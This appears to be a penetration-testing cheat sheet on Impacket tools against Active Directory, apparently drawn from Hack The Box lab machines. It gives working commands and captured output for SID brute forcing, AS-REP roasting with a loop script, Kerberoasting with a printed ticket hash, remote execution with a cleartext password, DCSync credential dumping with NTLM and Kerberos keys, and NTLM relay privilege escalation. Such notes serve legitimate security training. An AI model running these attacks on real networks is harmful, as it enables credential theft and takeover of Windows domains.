Impacket

Impacket in Kali linux is present here

/usr/share/doc/python3-impacket/examples

Lookup SID

└─# python3 ./lookupsid.py hazard:stealth1agent@10.129.96.157           
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

GetNPUsers

Identify users which do not require Kerberos preauthentication (to get TGT ticket)

impacket-GetNPUsers domain/user -request -no-pass -dc-ip <AD-IP>
impacket-GetNPUsers htb.local/svc-alfresco -no-pass -dc-ip 10.129.95.210
#!/bin/bash
while read p; 
do 
        echo "[$p]"
        impacket-GetNPUsers egotistical-bank.local/"$p" -request -no-pass -dc-ip 10.129.95.180 >> hash.txt;
done < ./usernames.txt

GetUserSPN

impacket-GetUserSPNs active.htb/svc_tgs -dc-ip 10.129.229.121 -request     
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-06-25 07:58:08.601346             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$07b7289ca17b0f3529dff209c5872316$12c0ee251b2f58e3a343efd0dcc5071c36146292f838f8bbabfe3ab7625cbda5f070abbfb731dab4179e106cdbd

GetADUsers

impacket-GetADUsers -all active.htb/svc_tgs -dc-ip 10.129.229.121
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Querying 10.129.229.121 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2018-07-18 15:06:40.351723  2023-06-25 07:58:08.601346 
Guest                                                 <never>              <never>             
krbtgt                                                2018-07-18 14:50:36.972031  <never>             
SVC_TGS

WMIexec

impacket-wmiexec active.htb/administrator:Ticketmaster1968@10.129.229.121

Secretdump - DSYNC

 impacket-secretsdump htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
└─$ impacket-secretsdump htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
[*] Cleaning up...

SMBServer

impacket-smbserver -smb2support share .

NTLM relay

/usr/share/doc/python3-impacket/examples/ntlmrelayx.py -t ldap://10.129.95.210 --escalate-user bigb0ss

PreviousSMB RelayNextBloodhound

Last updated